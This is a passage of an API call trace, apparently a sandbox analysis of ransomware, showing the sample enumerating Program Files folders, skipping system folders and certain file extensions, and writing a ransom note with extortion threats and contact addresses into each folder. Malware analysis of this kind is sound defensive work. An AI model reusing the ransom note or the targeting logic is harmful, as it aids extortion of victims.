ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 0 [0160.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd658 | out: hHeap=0xea0000) returned 1 [0160.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6790 | out: hHeap=0xea0000) returned 1 [0160.240] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.240] Sleep (dwMilliseconds=0x32) [0160.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede428 | out: hHeap=0xea0000) returned 1 [0160.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede4b0 | out: hHeap=0xea0000) returned 1 [0160.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2bb0 [0160.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6790 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2fd0 [0160.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb05d0 [0160.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2fd0 | out: hHeap=0xea0000) returned 1 [0160.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0160.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6790 | out: hHeap=0xea0000) returned 1 [0160.291] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\R3ADM3.txt" (normalized: "c:\\program files\\msbuild\\microsoft\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.293] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.293] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.294] CloseHandle (hObject=0x6dc) returned 1 [0160.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb05d0 | out: hHeap=0xea0000) returned 1 [0160.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0160.295] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6468e2b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6468e2b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.295] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6468e2b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6468e2b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.295] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6468e2b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x6468e2b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x6468e2b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.295] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.295] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.295] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.295] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.295] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.295] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.296] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.296] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.296] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.296] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 1 [0160.296] lstrcmpW (lpString1="Windows Workflow Foundation", lpString2=".") returned 1 [0160.296] lstrcmpW (lpString1="Windows Workflow Foundation", lpString2="..") returned 1 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="tmp") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="winnt") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="temp") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="thumb") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="$Recycle.Bin") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="System Volume Information") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="Boot") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="Windows") returned="Windows Workflow Foundation" [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch=".UAKXC") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch=".exe") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch=".dll") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch=".lnk") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch=".sys") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch=".msi") returned 0x0 [0160.296] StrStrIW (lpFirst="Windows Workflow Foundation", lpSrch="R3ADM3.txt") returned 0x0 [0160.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1890 [0160.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0160.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0160.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede4b0 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3080 | out: hHeap=0xea0000) returned 1 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2dc0 | out: hHeap=0xea0000) returned 1 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xea0000) returned 1 [0160.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede428 [0160.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6790 [0160.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd658 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede428 | out: hHeap=0xea0000) returned 1 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xede4b0 | out: hHeap=0xea0000) returned 1 [0160.297] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec31e0 | out: hHeap=0xea0000) returned 1 [0160.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67b8 | out: hHeap=0xea0000) returned 1 [0160.297] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.297] Sleep (dwMilliseconds=0x32) [0160.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2bb0 | out: hHeap=0xea0000) returned 1 [0160.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0160.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0160.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.353] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.353] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0160.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794868 [0160.354] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.354] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794868 | out: hHeap=0xea0000) returned 1 [0160.354] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.354] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67b8 | out: hHeap=0xea0000) returned 1 [0160.354] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\R3ADM3.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.356] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.356] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.357] CloseHandle (hObject=0x6dc) returned 1 [0160.358] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.358] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.358] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x64726830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64726830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.358] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.358] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x64726830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64726830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.358] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 1 [0160.358] lstrcmpW (lpString1="Framework", lpString2=".") returned 1 [0160.358] lstrcmpW (lpString1="Framework", lpString2="..") returned 1 [0160.358] StrStrIW (lpFirst="Framework", lpSrch="tmp") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="winnt") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="temp") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="thumb") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="$Recycle.Bin") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="System Volume Information") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="Boot") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="Windows") returned 0x0 [0160.359] StrStrIW (lpFirst="Framework", lpSrch="Trend Micro") returned 0x0 [0160.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0160.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794868 [0160.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0160.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794868 | out: hHeap=0xea0000) returned 1 [0160.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67b8 | out: hHeap=0xea0000) returned 1 [0160.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0160.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xede4b0 [0160.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0160.359] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64726830, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x64726830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64726830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0160.359] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0160.359] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0160.359] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0160.359] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0160.360] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0160.360] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0160.360] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0160.360] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0160.360] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0160.360] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64726830, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x64726830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x64726830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0160.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0160.361] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67e0 | out: hHeap=0xea0000) returned 1 [0160.361] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.361] Sleep (dwMilliseconds=0x32) [0160.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.469] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67e0 | out: hHeap=0xea0000) returned 1 [0160.469] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.471] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.471] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.472] CloseHandle (hObject=0x6dc) returned 1 [0160.472] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.472] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0160.472] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x647bedb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x647bedb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0160.473] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0160.473] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x647bedb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x647bedb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.473] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0160.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0160.474] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0160.474] lstrcmpW (lpString1="Benioku.htm", lpString2=".") returned 1 [0160.474] lstrcmpW (lpString1="Benioku.htm", lpString2="..") returned 1 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch=".UAKXC") returned 0x0 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch=".exe") returned 0x0 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch=".dll") returned 0x0 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch=".lnk") returned 0x0 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch=".sys") returned 0x0 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch=".msi") returned 0x0 [0160.474] StrStrIW (lpFirst="Benioku.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebe10 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebd40 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.474] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebd40 | out: hHeap=0xea0000) returned 1 [0160.474] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0160.474] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee67e0 | out: hHeap=0xea0000) returned 1 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0160.474] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794868 [0160.474] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.474] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.475] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0160.475] lstrcmpW (lpString1="Berime.htm", lpString2=".") returned 1 [0160.475] lstrcmpW (lpString1="Berime.htm", lpString2="..") returned 1 [0160.475] StrStrIW (lpFirst="Berime.htm", lpSrch=".UAKXC") returned 0x0 [0160.475] StrStrIW (lpFirst="Berime.htm", lpSrch=".exe") returned 0x0 [0160.475] StrStrIW (lpFirst="Berime.htm", lpSrch=".dll") returned 0x0 [0160.475] StrStrIW (lpFirst="Berime.htm", lpSrch=".lnk") returned 0x0 [0160.475] StrStrIW (lpFirst="Berime.htm", lpSrch=".sys") returned 0x0 [0160.475] StrStrIW (lpFirst="Berime.htm", lpSrch=".msi") returned 0x0 [0160.475] StrStrIW (lpFirst="Berime.htm", 